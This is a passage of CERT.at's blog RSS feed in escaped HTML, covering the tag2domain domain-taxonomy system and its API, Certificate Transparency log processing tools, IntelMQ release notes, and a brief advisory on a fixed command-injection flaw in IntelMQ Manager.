&lt;p class=&quot;block&quot;&gt;It consists of a taxonomy name (&amp;ldquo;&lt;strong&gt;DIT&lt;/strong&gt;&amp;rdquo;), a fixed list of possible tags (&amp;ldquo;&lt;strong&gt;Agriculture, Forestry, Fishing&amp;rdquo;, &amp;ldquo;Automotive&amp;rdquo;, &amp;ldquo;Beauty and Perfume&amp;rdquo;, &amp;ldquo;Cleaning and Facility Management&amp;rdquo;&lt;/strong&gt; , etc..).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Each possible tag may have a value associated with it which is basically a sub-category.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Example: &lt;strong&gt;&amp;ldquo;Automotive&amp;rdquo; -&amp;gt; &amp;ldquo;Maintenance&amp;rdquo;.&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In machine readable form, these taxonomies, tags and values shall be presented as:&lt;/p&gt;&#13;
&lt;pre class=&quot;block&quot;&gt;&amp;nbsp; taxonomy:tag = value&lt;/pre&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Example:&lt;/h3&gt;&#13;
&lt;pre class=&quot;block&quot;&gt;&amp;nbsp; DIT:Automotive = Maintenance&lt;/pre&gt;&#13;
&lt;p class=&quot;block&quot;&gt;(This is inspired by the MISP taxonomies structure. A taxonomy is thus basically a namespace for a set of tags).&amp;nbsp;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;It is easy to see that this structure is future-proof. If a given taxonomy does not fit your needs, it&amp;rsquo;s trivial to invent a new one with the required tags. Flexibility is also given.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;A taxonomy shall always be registered at the &lt;a href=&quot;https://github.com/MISP/misp-taxonomies&quot;&gt;taxonomy registry&lt;/a&gt; (operated by CIRCL, please issue pull requests to their repository). A taxonomy shall be given in the &lt;a href=&quot;https://github.com/MISP/misp-taxonomies/blob/main/README.md&quot;&gt;machine-tag &lt;/a&gt;format.&amp;nbsp;&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;How to use it and how to fit a taxonomy and tags to existing databases/tables of domain names?&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&amp;nbsp;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20200709/schema.png&quot; alt=&quot;EER diagram on how to map domains to the tag2domain system&quot; width=&quot;1024&quot; height=&quot;808&quot; /&gt;&amp;nbsp;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We created a sample mapping structure including documentation on our &lt;a href=&quot;https://github.com/certtools/tag2domain&quot;&gt;github repository&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;One important thing to remember is that:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Every mapping is time-dependent: a mapping of domain name to tag only exists at a specific point (or interval) in time. Therefore, any intersection tables between tags and domains (see the github link above) always need to include a timestamp which indicates validity&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Mappings should be done automatically. There is no golden rule on how to create a mapping. It is domain specific for each taxonomy. An example for mapping domains names to a &amp;ldquo;is a first name (Y/N)?&amp;rdquo; &amp;ndash; tag is a word splitting algorithm which has a large dictionary of common first names. Other approaches will have to use machine learning and natural language processing libraries.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Querying the tag2domain database&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We created a small container based microservice which implements a query interface, called &amp;ldquo;&lt;a href=&quot;https://github.com/certtools/tag2domain/tree/master/api&quot;&gt;tag2domain-api&lt;/a&gt;&amp;rdquo;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;It supports the following RESTful API endpoints:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;code&gt;/api/v1/taxonomies/all &amp;hellip;.get all possible taxonomies&lt;/code&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;code&gt;/api/v1/tags/all&amp;nbsp; &amp;hellip; get all possible tags (for all taxonomies)&lt;/code&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;code&gt;/api/v1/taxonomies/bydomain/{domain}&amp;nbsp;&amp;nbsp; &amp;hellip; get all taxonomies for a given domain.&lt;/code&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;code&gt;/api/v1/tags/bydomain/{domain}&amp;nbsp; &amp;hellip; get all tags for a given domain&lt;/code&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;code&gt;/api/v1/domains/bytag/{tag}&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;hellip; get a list of all domains which match a specific tag&lt;/code&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;code&gt;/api/v1/domains/bytaxonomy/{taxonomy}&amp;nbsp;&amp;nbsp; &amp;hellip; get a list of all domains, which are in a specific taxonomy&lt;/code&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&amp;nbsp;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Let us know, what you think. The author of this blog post can be reached via &lt;a href=&quot;https://github.com/aaronkaplan/&quot;&gt;github&lt;/a&gt; &amp;nbsp;or at &lt;a href=&quot;mailto:kaplan@cert.at&quot;&gt;kaplan@cert.at&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&amp;nbsp;&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Thu, 09 Jul 2020 16:46:55 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2020/7/tag2domain</guid><dc:creator>CERT.at</dc:creator><dc:date>2020-07-09T16:46:55Z</dc:date></item><item><title>Tools for processing Certificate Transparency Log data of &quot;certspotter&quot; published</title><link>https://www.cert.at/en/blog/2020/6/tools-for-processing-certificate-transparency-log-data-of-certspotter-published</link><description>&lt;p class=&quot;block&quot;&gt;The &lt;a href=&quot;https://www.energy-cert.at/en/&quot;&gt;Austrian Energy CERT&lt;/a&gt; and the &lt;a href=&quot;https://www.govcert.gv.at/index_en.html&quot;&gt;GovCERT Austria&lt;/a&gt; monitor the &lt;a href=&quot;https://en.wikipedia.org/wiki/Certificate_Transparency#Certificate_Transparency_logs&quot;&gt;Certificate Transparency Logs (&quot;CTL&quot;)&lt;/a&gt; for their constituents' domains. These Logs contain any newly issued server certificates and monitoring those lists allows for timely detection of abuse. Our processing chain of this data involves several steps which can be useful for other CERTs and security teams. Our experience gained on the processing of this kind of data as well as code will also be incorporated in the further development of &lt;a href=&quot;https://github.com/certtools/intelmq/&quot;&gt;IntelMQ&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The tools are published &lt;a href=&quot;https://github.com/certat/certspotter-processing&quot;&gt;on our GitHub page&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Tue, 30 Jun 2020 11:12:10 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2020/6/tools-for-processing-certificate-transparency-log-data-of-certspotter-published</guid><dc:creator>CERT.at</dc:creator><dc:date>2020-06-30T11:12:10Z</dc:date></item><item><title>IntelMQ Releases 2.1.3 and 2.2.0</title><link>https://www.cert.at/en/blog/2020/6/intelmq-releases-213-and-220</link><description>&lt;p class=&quot;block&quot;&gt;On 26th of May we released the IntelMQ &lt;a href=&quot;https://github.com/certtools/intelmq/releases/tag/2.1.3&quot;&gt;Maintenance Version 2.1.3&lt;/a&gt; and on 18th June the Feature &lt;a href=&quot;https://github.com/certtools/intelmq/releases/tag/2.2.0&quot;&gt;Release 2.2.0&lt;/a&gt;. Both versions include various changes, both error corrections and new functionality. We thank all contributors and members of the IntelMQ community for their participation in this community-led project.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The Version 2.1.3 mainly fixes errors, for example it improved the error &amp;amp; exception handling and thus the usability. It further contains fixes in 12 bots and even more changes in the core, tests, documentation and supporting tools.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Version 2.2.0 introduces several new bots and support for new feeds, including: Github API Collector, Github Feed Parser, CSV Converter Expert, MISP Expert, MISP Feed Output and MISP API Output. Other bots received major improvements: Microsoft Azure Collector, STOMP collector, AnubisNetworks Parser, Cymru Full Bogons Parser, Taichung Parser, Microsoft CTIP Parser, AMQP Output, ElasticSearch Output.&lt;br /&gt;More information on the Bots included in version 2.2.0 can be found in the &lt;a href=&quot;https://github.com/certtools/intelmq/blob/2.2.0/docs/Bots.md&quot;&gt;Bots' documentation&lt;/a&gt;.&lt;br /&gt;The feature release also includes several changes in the common libraries and tools, enhancing contributions and usability.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Due to discontinued data feeds, the support for seven feed groups/providers has been removed in these releases, which also resulted in the removal of six bots. Further, IntelMQ no longer supports Python version 3.4, which itself already reached it's &quot;End Of Life&quot;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The &lt;a href=&quot;https://github.com/certtools/intelmq/tree/maintenance/docs&quot;&gt;documentation&lt;/a&gt; and &lt;a href=&quot;https://github.com/certtools/intelmq/blob/maintenance/docs/INSTALL.md&quot;&gt;installation instructions&lt;/a&gt; can be found on our &lt;a href=&quot;https://github.com/certtools/intelmq/&quot;&gt;Github repository&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202001291050/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union; Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Thu, 18 Jun 2020 14:29:57 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2020/6/intelmq-releases-213-and-220</guid><dc:creator>CERT.at</dc:creator><dc:date>2020-06-18T14:29:57Z</dc:date></item><item><title>IntelMQ Manager release 2.1.1 fixes critical security issue</title><link>https://www.cert.at/en/blog/2020/4/intelmq-manager-release-211-fixes-critical-security-issue</link><description>&lt;p class=&quot;block&quot;&gt;The &lt;a href=&quot;https://github.com/certtools/intelmq-manager/releases/tag/2.1.1&quot;&gt;IntelMQ Manager version 2.1.1&lt;/a&gt; released yesterday fixes a &lt;em&gt;Remote Code Execution&lt;/em&gt; flaw (&lt;a href=&quot;https://cwe.mitre.org/data/definitions/78.html&quot;&gt;CWE-78&lt;/a&gt;: 'OS Command Injection'). The &lt;a href=&quot;https://github.com/certtools/intelmq-manager/tree/2.1.1/docs&quot;&gt;documentation&lt;/a&gt; for version 2.1.1 and &lt;a href=&quot;https://github.com/certtools/intelmq-manager/tree/2.1.1/docs/INSTALL.md&quot;&gt;installation instructions&lt;/a&gt; can be found on our &lt;a href=&quot;https://github.com/certtools/intelmq-manager/&quot;&gt;GitHub repository&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Always run IntelMQ Manager instances in private networks with proper authentication &amp;amp; TLS. Further, restrict access to the tool to web-browsers which can only access internal web-sites, as workaround for existing CSRF issues. See also our &lt;a href=&quot;https://github.com/certtools/intelmq-manager/blob/develop/docs/INSTALL.md#security-considerations&quot;&gt;security considerations&lt;/a&gt; with more details.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The issue was discovered by &lt;a href=&quot;https://github.com/bernhard-herzog&quot;&gt;Bernhard Herzog&lt;/a&gt; (&lt;a href=&quot;https://intevation.de/index.en.html&quot;&gt;Intevation&lt;/a&gt;) during work sponsored by &lt;a href=&quot;https://www.sunet.se/about-sunet/&quot;&gt;SUNET&lt;/a&gt; to fix the &lt;a href=&quot;https://github.com/certtools/intelmq-manager/issues/111&quot;&gt;missing CSRF protection&lt;/a&gt; and &lt;a href=&quot;https://github.com/certtools/intelmq-manager/issues/80&quot;&gt;migrate the application backend to Python&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Update 2020-04-30: This vulnerability has been assigned CVE-2020-11016.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202001291050/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union; Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Tue, 28 Apr 2020 14:34:25 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2020/4/intelmq-manager-release-211-fixes-critical-security-issue</guid><dc:creator>CERT.at</dc:creator><dc:date>2020-04-28T14:34:25Z</dc:date></item><item><title>IntelMQ Version 2.1.2 released</title><link>https://www.cert.at/en/blog/2020/1/intelmq-version-212-released</link><description>&lt;p class=&quot;block&quot;&gt;On 28&lt;sup&gt;th&lt;/sup&gt; January, we released the &lt;a href=&quot;https://github.com/certtools/intelmq/releases/tag/2.1.2&quot;&gt;IntelMQ maintenance version 2.1.2&lt;/a&gt; containing only bugfixes for the 2.1.x release series. The &lt;a href=&quot;https://github.com/certtools/intelmq/tree/2.1.2/docs&quot;&gt;documentation for version 2.1.2&lt;/a&gt; and &lt;a href=&quot;https://github.com/certtools/intelmq/blob/2.1.2/docs/INSTALL.md&quot;&gt;installation instructions&lt;/a&gt; can be found on our &lt;a href=&quot;https://github.com/certtools/intelmq&quot;&gt;github repository&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The upcoming version 2.2.0 - and current development version - will have several new features to offer.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202001291050/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union; Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Wed, 29 Jan 2020 14:46:32 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2020/1/intelmq-version-212-released</guid><dc:creator>CERT.at</dc:creator><dc:date>2020-01-29T14:46:32Z</dc:date></item></channel></rss>
